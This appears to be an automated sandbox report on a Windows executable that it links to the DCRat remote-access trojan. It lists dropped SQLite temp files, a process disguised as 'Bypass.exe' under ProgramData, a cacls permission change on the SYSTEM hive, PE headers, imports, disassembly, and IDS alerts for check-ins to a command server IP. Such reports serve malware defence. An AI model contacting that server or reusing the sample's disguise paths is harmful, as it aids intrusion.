SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xUmTxyW3TI

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xel9L1xMgV

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\y1i14RBep3

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yQOuR0mYbY

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yzfMutHHeT

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\z56rhRXEbE

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zJUBTXYuqI

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zPET5i21z5

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zQTgfPF2kT

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zcd50XGtE5

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zgDf1n74Wt

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zqauiY1j27

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zu0BNJ9Inl

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\cacls.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.323081947925383
Encrypted:	false
SSDEEP:	3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
MD5:	43B1EC1407EA9C0219A563FFFEEAE780
SHA1:	C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
SHA-256:	7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
SHA-512:	5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
Malicious:	false
Preview:	C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.738798470730106
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bFZYRLnRIz.exe
File size:	1'939'559 bytes
MD5:	289f27e7a02f8e76ebf39d2c0c3f09e4
SHA1:	fb404a7a85d5fb617436f73832e4716556756d6a
SHA256:	854d267aea33e8dc80021ac043b003ab7c6f99061e56e36572cba3548e6882c9
SHA512:	38798cc71da6dfd8022dff2be635db8b938ba8d8dc5db8196802af2d9deb26dda145e0e581a6b8eb7022a1e0c33ff34c666cc4817f9f2ac50d1f362f434a75fe
SSDEEP:	24576:KuDXTIGaPhEYzUzA0Dz46fMR/6Y/M3pPux8KVzVvu9JDcEL0NLpgjdyWhPOePTnK:9Djlabwz9PHMf/M3BuxbzuDQyBPXam0H
TLSH:	E2950209F39508F8D0F6E2788956C973E7757C4A03619A8F23E56D673E37360AE2A311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

File Icon


Icon Hash:	97170629070e2d00

Static PE Info

General

Entrypoint:	0x140032ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66409723 [Sun May 12 10:17:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b1c5b1beabd90d9fdabd1df0779ea832

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F09B5094208h
dec eax
add esp, 28h
jmp 00007F09B5093B9Fh
int3
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F09B5093023h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007F09B5093D33h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007F09B5095D47h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F09B50825B3h
dec eax
lea edx, dword ptr [00025747h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F09B5094E02h
int3
jmp 00007F09B509AFE4h
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x597a0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x597d4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x70000	0x155a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6a000	0x306c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x970	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x536c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53780	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b3f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x508	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x588bc	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4676e	0x46800	f06bb06e02377ae8b223122e53be35c2	False	0.5372340425531915	data	6.47079645411382	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x128c4	0x12a00	2de06d4a6920a6911e64ff20000ea72f	False	0.4499003775167785	data	5.273999097784603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5b000	0xe75c	0x1a00	0dbdb901a7d477980097e42e511a94fb	False	0.28275240384615385	data	3.2571023907881185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x6a000	0x306c	0x3200	b0ce0f057741ad2a4ef4717079fa34e9	False	0.483359375	data	5.501810413666288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat	0x6e000	0x360	0x400	1fcc7b1d7a02443319f8fcc2be4ca936	False	0.2578125	data	3.0459938492946015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6f000	0x15c	0x200	3f331ec50f09ba861beaf955b33712d5	False	0.408203125	data	3.3356393424384843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x70000	0x155a0	0x15600	d3a15fc8768566896c13172de43c9931	False	0.15362298976608188	data	2.471955605252558	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x86000	0x970	0xa00	77a9ddfc47a5650d6eebbcc823e39532	False	0.52421875	data	5.336289720085303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
PNG	0x70560	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	1.0027729636048528
PNG	0x710a8	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	0.9363390441839495
RT_ICON	0x72654	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m	0.015778421862060805
RT_DIALOG	0x82e7c	0x2ba	data	0.5286532951289399
RT_DIALOG	0x83138	0x13a	data	0.6560509554140127
RT_DIALOG	0x83274	0xf2	data	0.71900826446281
RT_DIALOG	0x83368	0x14a	data	0.6
RT_DIALOG	0x834b4	0x314	data	0.47588832487309646
RT_DIALOG	0x837c8	0x24a	data	0.6279863481228669
RT_STRING	0x83a14	0x1fc	data	0.421259842519685
RT_STRING	0x83c10	0x246	data	0.41924398625429554
RT_STRING	0x83e58	0x1a6	data	0.514218009478673
RT_STRING	0x84000	0xdc	data	0.65
RT_STRING	0x840dc	0x470	data	0.3873239436619718
RT_STRING	0x8454c	0x164	data	0.5056179775280899
RT_STRING	0x846b0	0x110	data	0.5772058823529411
RT_STRING	0x847c0	0x158	data	0.4563953488372093
RT_STRING	0x84918	0xe8	data	0.5948275862068966
RT_STRING	0x84a00	0x1c6	data	0.5242290748898678
RT_STRING	0x84bc8	0x268	data	0.4837662337662338
RT_GROUP_ICON	0x84e30	0x14	data	1.25
RT_MANIFEST	0x84e44	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/23/24-06:54:21.035775	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49745	92.53.96.121	192.168.2.4
06/23/24-06:56:28.389945	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49773	92.53.96.121	192.168.2.4
06/23/24-06:55:24.045906	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49762	92.53.96.121	192.168.2.4
06/23/24-06:57:31.268133	TCP	2850862	ETPRO TROJAN DCRat Initial Checkin Server Response M4	80	49784	92.53.96.121	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 23, 2024 06:54:14.577907085 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:14.578022003 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:14.578123093 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:14.579855919 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:14.579895020 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.064431906 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.064523935 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.067174911 CEST	49731	443	192.168.2.4	104.21.90.18
Jun 23, 2024 06:54:15.067197084 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.067600012 CEST	443	49731	104.21.90.18	192.168.2.4
Jun 23, 2024 06:54:15.117496967 CEST	49731	443	192.168.2.4	104.21.90.18
